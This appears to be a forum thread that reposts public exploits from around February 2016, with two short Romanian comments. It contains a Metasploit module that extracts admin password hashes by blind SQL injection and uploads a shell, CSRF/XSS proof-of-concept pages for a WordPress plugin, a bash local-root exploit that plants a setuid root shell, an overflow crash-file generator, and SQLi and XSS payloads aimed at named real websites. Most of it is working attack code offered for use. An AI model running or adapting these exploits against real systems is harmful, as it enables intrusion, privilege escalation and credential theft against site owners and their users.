generate_sql_and_test(do_true=false, do_test=false, sql=sqli, cookie).to_i for i in 1..login_and_hash_length sqli = "ascii(substring((select/**/concat(login,0x3a,password)/**/from/**/AT_admins/**/limit/**/0,1),#{i},1))" asciival = generate_sql_and_test(false, false, sqli, cookie) if asciival >= 0 extracted_hash << asciival.chr end end return extracted_hash.split(":") end def get_ascii_value(sql, cookie) lower = 0 upper = 126 while lower < upper mid = (lower + upper) / 2 sqli = "#{sql}>#{mid}" result = perform_request(sqli, cookie) if result =~ /There are d entries./ lower = mid + 1 else upper = mid end end if lower > 0 and lower < 126 value = lower else sqli = "#{sql}=#{lower}" result = perform_request(sqli, cookie) if result =~ /There are d entries./ value = lower end end return value end def generate_sql_and_test(do_true=false, do_test=false, sql=nil, cookie) if do_test if do_true result = perform_request("1=1", cookie) if result =~ /There are d entries./ return true end else not do_true result = perform_request("1=2", cookie) if not result =~ /There are d entries./ return true end end elsif not do_test and sql return get_ascii_value(sql, cookie) end end def test_injection(cookie) if generate_sql_and_test(do_true=true, do_test=true, sql=nil, cookie) if generate_sql_and_test(do_true=false, do_test=true, sql=nil, cookie) return true end end return false end def report_cred(opts) service_data = { address: rhost, port: rport, service_name: ssl ? 'https' : 'http', protocol: 'tcp', workspace_id: myworkspace_id } credential_data = { module_fullname: fullname, post_reference_name: self.refname, private_data: opts[:password], origin_type: :service, private_type: :password, username: opts[:user] }.merge(service_data) login_data = { core: create_credential(credential_data), status: Metasploit::Model::Login::Status::SUCCESSFUL, last_attempted_at: Time.now }.merge(service_data) create_credential_login(login_data) end def exploit student_cookie = login(datastore['USERNAME'], datastore['PASSWORD'], false) print_status("Logged in as #{datastore['USERNAME']}, sending a few test injections...") report_cred(user: datastore['USERNAME'], password: datastore['PASSWORD']) print_status("Dumping username and password hash...") # we got admin hash now credz = dump_the_hash(student_cookie) print_good("Got the #{credz[0]} hash: #{credz[1]} !") if credz admin_cookie = login(credz[0], credz[1], true) print_status("Logged in as #{credz[0]}, uploading shell...") # install a plugin if upload_shell(admin_cookie) print_good("Shell upload successful!") # boom exec_code end end end end exploit source : packetstormsecurity.com
  15. daca dai comment doar ca sa fie la numar te inteleg ....dar ca nu citesti CREDITS asta sincer nu prea o inteleg
  16. # Exploit Title: WordPress CP Polls 1.0.8 - Cross-site file upload & persistent XSS # Date: 2016-02-22 # Google Dork: Index of /wp-content/plugins/cp-polls/ # Exploit Author: Joaquin Ramirez Martinez [ i0akiN SEC-LABORATORY ] # Plugin URI: http://wordpress.dwbooster.com/forms/cp-polls # Version: 1.0.8 ============= Description ============= With **CP Polls** you can publish a poll into a page/post and optionally display statistics of the results. You can receive email notifications every time a vote is added or opt to receive Excel reports periodically. The Polls can have dependant questions, this means that some questions are displayed depending of the selection made on other questions. (copy of README.txt) =================== Technical details =================== CP Polls plugin for wordpress is prone to persistent XSS via cross-site file upload. When we register an cp_poll, it is sanitized correctly but when we upload a CSV file, we can bypass the protection and inject malicious HTML/Javascript. There are not CSRF protection in that action so it can be exploited with a CSRF attack by sending a malicious link to a victim (administrator) a wait for execution of the malicious request. ========================= Proof of Concept (html) ========================= <html> <body> <script> function submitRequest() { var xhr = new XMLHttpRequest(); xhr.open("POST", "http://<wp.host>/wp-admin/admin.php?page=CP_Polls&cal=1&list=1&import=1", true); xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"); xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------17460754011784"); xhr.setRequestHeader("Accept-Language", "es-MX,es-ES;q=0.9,es;q=0.7,es-AR;q=0.6,es-CL;q=0.4,en-US;q=0.3,en;q=0.1"); xhr.withCredentials = true; var body = "-----------------------------17460754011784\r\n" + "Content-Disposition: form-data; name="importfile"; filename="csv.csv"\r\n" + "Content-Type: application/octet-stream\r\n" + "\r\n" + "2013-04-21 18:50:00, 192.168.1.12, <img src=x onerror=alert('You_are_owned!')>, "<img src=x onerror=alert('I am scared!')>", "sample subject", ""\r\n" + "-----------------------------17460754011784\r\n" + "Content-Disposition: form-data; name="pbuttonimport"\r\n" + "\r\n" + "Import\r\n" + "-----------------------------17460754011784--\r\n"; var aBody = new Uint8Array(body.length); for (var i = 0; i < aBody.length; i++) aBody[i] = body.charCodeAt(i); xhr.send(new Blob([aBody])); } </script> <form action="#"> <input type="button" value="Submit request" onclick="submitRequest();" /> </form> </body> </html> ========== CREDITS ========== Vulnerability discovered by: Joaquin Ramirez Martinez [i0 security-lab] joaquin.ramirez.mtz.lab[at]gmail[dot]com https://www.facebook.com/I0-security-lab-524954460988147/ https://www.youtube.com/channel/UCe1Ex2Y0wD71I_cet-Wsu7Q ======== TIMELINE ======== 2016-02-10 vulnerability discovered 2016-02-22 reported to vendor 2016-03-01 released cp polls v1.0.9 2016-03-01 public disclousure
  17. # Exploit Title: WordPress CP Polls 1.0.8 - Reflected file download (.bat file) # Date: 2016-02-22 # Google Dork: Index of /wp-content/plugins/cp-polls/ # Exploit Author: Joaquin Ramirez Martinez [ i0akiN SEC-LABORATORY ] # Plugin URI: http://wordpress.dwbooster.com/forms/cp-polls # Version: 1.0.8 # Demo: https://www.youtube.com/watch?v=uc6P59BPEkU ============= Description ============= With **CP Polls** you can publish a poll into a page/post and optionally display statistics of the results. You can receive email notifications every time a vote is added or opt to receive Excel reports periodically. The Polls can have dependant questions, this means that some questions are displayed depending of the selection made on other questions. (copy of README.txt) =================== Technical details =================== CP Polls plugin for wordpress is prone to file download issue. A hacker is able to attack an administrator by exploiting a CSRF in the 'change cp poll name' converting the downloadable report file (csv) to a malicious .bat file. Because there is not restriction in the cp poll name the CSRF exploit can change the name to ... malicious.bat; The semicolon (;) character must be restricted because the header 'Content-Disposition' uses this characteer as a parameter delimitation. For example, when we change the name of a cp poll to 'malicious.bat;' when an administrator download the report (thinking that is a csv file) the response header turns: "" Content-Disposition: attachment; file=malicious.bat;.csv "" the csv is ignored and the administrator gets a .BAT file So, how to exploit this vulnerability to execute commands on the victim's machine? Whe have an option. If the cp_poll is added in a post we can vote them and we can inject our malicious payload into a votation. ============================== Proof of Concept CSRF (html) ============================== https://www.youtube.com/watch?v=uc6P59BPEkU ========================== If the csrf attack is succesful, we only need to inject our commands in votations. In ´fieldnames´ post parameter we can inject our commands. ========== CREDITS ========== Vulnerability discovered by: Joaquin Ramirez Martinez [i0 security-lab] joaquin.ramirez.mtz.lab[at]gmail[dot]com https://www.facebook.com/I0-security-lab-524954460988147/ https://www.youtube.com/channel/UCe1Ex2Y0wD71I_cet-Wsu7Q ======== TIMELINE ======== 2016-02-10 vulnerability discovered 2016-02-22 reported to vendor 2016-03-01 released cp polls v1.0.9 2016-03-01 public disclousure
  18. #!/bin/bash # unsanitary.sh - ASAN/SUID Local Root Exploit # Exploits er, unsanitized env var passing in ASAN # which leads to file clobbering as root when executing # setuid root binaries compiled with ASAN. # Uses an overwrite of /etc/ld.so.preload to get root on # a vulnerable system. Supply your own target binary to # use for exploitation. # Implements the bug found here: http://seclists.org/oss-sec/2016/q1/363 # Video of Exploitation: https://www.youtube.com/watch?v=jhSIm3auQMk # Released under the Snitches Get Stitches Public Licence. # Gr33tz to everyone in #lizardhq and elsewhere <3 # ~infodox (18/02/2016) # FREE LAURI LOVE! echo "Unsanitary - ASAN/SUID Local Root Exploit ~infodox (2016)" if [[ $# -eq 0 ]] ; then echo "use: $0 /full/path/to/targetbin" echo "where targetbin is setuid root and compiled w/ ASAN" exit 0 fi echo "[+] First, we create our shell and library..." cat << EOF > /tmp/libhax.c #include <stdio.h> #include <sys/types.h> #include <unistd.h> __attribute__ ((__constructor__)) void dropshell(void){ chown("/tmp/rootshell", 0, 0); chmod("/tmp/rootshell", 04755); unlink("/etc/ld.so.preload"); printf("[+] done!\n"); } EOF gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c rm -f /tmp/libhax.c cat << EOF > /tmp/rootshell.c #include <stdio.h> int main(void){ setuid(0); setgid(0); seteuid(0); setegid(0); execvp("/bin/sh", NULL, NULL); } EOF gcc -o /tmp/rootshell /tmp/rootshell.c rm -f /tmp/rootshell.c echo "[+] Now we drop our python symlink spraying tool..." cat << EOF > sym.py #!/usr/bin/python import os curpid=os.getpid() print curpid for x in range(0,100): newpid=curpid+x boom = "foo.%s" %(str(newpid)) os.symlink("/etc/ld.so.preload", boom) EOF echo "[+] Spraying dir with symlinks..." python sym.py echo "[+] Hack the planet!" ASAN_OPTIONS='suppressions="/hacktheplanet /tmp/libhax.so hacktheplanet" log_path=./foo verbosity=1' $1 >/dev/null 2>&1 $1 >/dev/null 2>&1 echo "[+] Tidy up a bit..." rm -f foo* rm -f sym.py rm -f /tmp/libhax.so echo "[<3] :PPpPpPpOpr000000t!" /tmp/rootshell
  19. Advisory ID: HTB23291 Product: webSPELL Vendor: webSPELL.org Vulnerable Version(s): 4.2.4 and probably prior Tested Version: 4.2.4 Advisory Publication: January 22, 2016 [without technical details] Vendor Notification: January 22, 2016 Vendor Patch: February 12, 2016 Public Disclosure: February 17, 2016 Vulnerability Type: SQL Injection [CWE-89] Risk Level: Medium CVSSv3 Base Score: 6.3 [CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L] Solution Status: Fixed by Vendor Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) ----------------------------------------------------------------------------------------------- Advisory Details: High-Tech Bridge Security Research Lab discovered two vulnerabilities in a popular CMS webSPELL developed for the needs of esport related communities. The vulnerability allows a remote authenticated attacker with cashbox access privileges to execute arbitrary SQL commands in applications database and completely compromise the vulnerable website. This vulnerability can be also exploited by non-authenticated and unprivileged attacker via the CSRF vector, to which the system is also prone. The vulnerability exists due to insufficient filtration of user-supplied data passed via "payid" HTTP POST parameter to "/cash_box.php" script. A remote authenticated attacker, with cashbox access privileges, can alter the present SQL query and execute arbitrary SQL commands in applications database. A simple exploit below uses a time-based SQL injection technique to determine current version of MySQL server. The page will be loaded with some delay, if the current MySQL server version is 5.x: <form action="http://[host]/cash_box.php" method="post" name="main"> <input type="hidden" name="pay" value="1"> <input type="hidden" name="payid[' PROCEDURE analyse((select extractvalue(rand(), concat(0x3a, (IF(MID(version(), 1, 1) LIKE 5, BENCHMARK(5000000, SHA1(1)), 1))))), 1) -- 2]" value="1"> <input value="submit" id="btn" type="submit" /> </form> This vulnerability can be also exploited via CSRF vector, as the "/cash_box.php" script does not validate origin of HTTP request before processing user-supplied data in SQL query. ----------------------------------------------------------------------------------------------- Solution: Update to webSPELL 4.2.5 More Information: https://github.com/webSPELL/webSPELL/issues/309 ----------------------------------------------------------------------------------------------- References: [1] High-Tech Bridge Advisory HTB23291 - https://www.htbridge.com/advisory/HTB23291 - SQL Injection in webSPELL [2] webSPELL - https://www.webspell.org/ - webSPELL is a free content management system under GNU GPL for creating websites easily [3] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. [4] ImmuniWeb - https://www.htbridge.com/immuniweb/ - web security platform by High-Tech Bridge for on-demand and continuous web application security, vulnerability management, monitoring and PCI DSS compliance. [5] Free SSL/TLS Server test - https://www.htbridge.com/ssl/ - check your SSL implementation for PCI DSS and NIST compliance. Supports all types of protocols. ----------------------------------------------------------------------------------------------- Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.
  20. arhiva nu e buna inclusiv cu parola decriptata in base 64
  21. ###################### # Exploit Title : VANIRA CMS Cross Site Scripting # Exploit Author : Persian Hack Team # Vendor Homepage : http://tursweb.com/ # Google Dork : "Web Design > Tursweb.com " lang= # Date: 2016/02/23 # Version : 6 ###################### # PoC: # lang=[XSS] # Payload = '><img onerror=alert(1) src="asd"> # # http://hncmed.ir/home.php?lang=fa%22%3E%3Cimg%20onerror=alert%281%29%20src=%22asd%22%3E # http://gceramas.ir/pdview.php?&lang=fa%22%3E%3Cimg%20onerror=alert%281%29%20src=%22asd%22%3E # http://isatismodava.com/home.php?lang=fa%22%3E%3Cimg%20onerror=alert%281%29%20src=%22asd%22%3E # http://spadk9.com/shopcat.php?lang=fa%22%3E%3Cimg%20onerror=alert%281%29%20src=%22asd%22%3E # http://iransommer.com/productcat.php?lang=fa%22%3E%3Cimg%20onerror=alert%281%29%20src=%22asd%22%3E # ###################### # Discovered by : # Mojtaba MobhaM (kazemimojtaba@live.com) # T3NZOG4N (t3nz0g4n@yahoo.com) # Homepage : persian-team.ir ######################
  22. # Exploit Title: STIMS CUTTER OVERFLOW SEH OVERWRITE # Date: 19 Feb 2016 # Exploit Author: Shantanu Khandelwal <shantanu561993@gmail.com <ishitasailor@gmail.com>> # Vendor Homepage: http://www.stimslabs.com/ # Software Link: http://www.stimslabs.com/en/cutter/STIMSCutterEnSetup.exe # Version: 1.1.3.20 # Tested on: Windows XP SP3 # CVE : UNKNOWN # ==============HOW TO CRASH ================== #make the cutt file and open it it the STIMS Cutter application. #Click on Build Report #=========================================== #Problems in exploitation #Unable to find suitable SEH pointer # #!/usr/bin/env python f=open("crash.cutt","w") payload = """<!--block:#solution--> [solution] name=""" payload+="A"*8452 payload +="BBBB" #SEH overwrite payload +="""CCCC desc=A time=0 version=1 file=C:Documents and SettingsIEUserDesktopABC.cutt time.created=131003117142810000 app=1.1.3 projects=1 <!--#solution:block--> <!--block:A--> [properties] optimize=0 level=0 diversity=0 status=0 active=1 remnants=0 sort=0 version=1 desc=S comment= comment.active=0 notes= notes.active=0 material=A progress=100 calculation=0D99FF12 cost=222.000 time.gone=0 time.date=2016 Feb 18 23.29.14 payload=2 file=C:Documents and SettingsIEUserDesktopABC.cutt app=1.1.3 [order.blanks] b001={ "uid": "908113387", "material": "A", "length": "222", "quantity": "1", "knife": "1", "indent": "11", "cost": "1.0", "comment": "1", "id": "1", "name": "a" } [order.pieces] p001={ "uid": "124270241", "material": "A", "length": "111", "quantity": "1", "label": "1", "comment": "1", "id": "1", "name": "a", "orphans": "0" } [layout.summary] summary={ "output": "112.000", "used.len": "222.000", "used": "1", "pieces": "1", "cmu": "50.450", "waste": "49.550", "shifts": "1", "remnants": "0.000", "srest": "110.000", "cost": "222.000", "cost.ppu": "1.982", "brest": "110.0", "status": "", "type": "summary", "time.gone": "0", "time.date": "2016 Feb 18 23.29.14" } blank01={ "name": "a", "cost": "1.000000", "blank": "1", "used": "1", "pieces": "1", "cmu": "50.450", "waste": "49.550", "shifts": "1", "output": "112.000", "used.len": "222.000", "cost.sum": "222.000", "cost.ppu": "1.982", "remnants": "0.000" } [layout.cuttings] c001={ "signature": "1#a1-", "copies": "1", "remains": "110", "blank": "1", "shifts": "1", "output": "#1 1", "layout": "111" } [layout.cuttings.parts] c001={ "signature": "1#a1-", "copies": "1", "remains": "110", "blank": "1", "shifts": "1", "output": "#1 1", "layout": "111", "name": "1" } <!--A:block--> """ f.write(payload) f.close()
  23. ##################### # Exploit Title : 2016 Website Developed by Silvery Infotech sql injection # Exploit Author : Ashiyane Digital Security Team # Google Dork : "intext:Developed by Silvery Infotech" inurl:page.php?id= # Date: 20 Feb 2016 # Tested On : Windows 10 , Kali linux ################################# # Exploit And Demo: # Vulnerable PHP File = page.php # Vulnerable Parameter = id # # Attack Like : http://artlinkinteriors.com/page.php?id=-1%27%20and/**x**/@ghasem20:=concat_ws%280x3c62723e,@@version%29%20UNION%20SELECT%201,2,3,4,5,group_concat%280x3c62723e,table_name%29,7,8,9%20from%20information_schema.tables%20where%20table_schema=database%28%29--%20- ###################### # discovered by : ghasem20 # tnx : h_sqli.empire ######################
  24. Dimofinf CMS 3.0.0 Cross Site Scripting Published Credit Risk 2016.02.18 Persian Hack Team Low CWE CVE Local Remote CWE-79 N/A No Yes Dork: "Powered by Dimofinf cms Version 3.0.0" ###################### # Exploit Title : Dimofinf CMS 3.0.0 Cross Site Scripting # Exploit Author : Persian Hack Team # Vendor Homepage : http://www.dimofinf.net/index.php # Google Dork : "Powered by Dimofinf cms Version 3.0.0" # Date: 2016/02/17 # Version = 3.0.0 ###################### # PoC: # Username: MobhaM" onmouseover=alert("MobhaM") bad=" # Password : 0 # # http://www.dawadmisms.net/dimcp/login.php # http://www.aswarzan.com/dimcp/login.php # http://drhananclinic.com.sa/dimcp/login.php # http://www.newsqassim.com/dimcp/login.php # http://www.sudaninet.net/dimcp/login.php # ###################### # Discovered by : # Mojtaba MobhaM (kazemimojtaba@live.com) # T3NZOG4N (t3nz0g4n@yahoo.com) # Homepage : persian-team.ir ######################
×
×
  • Create New...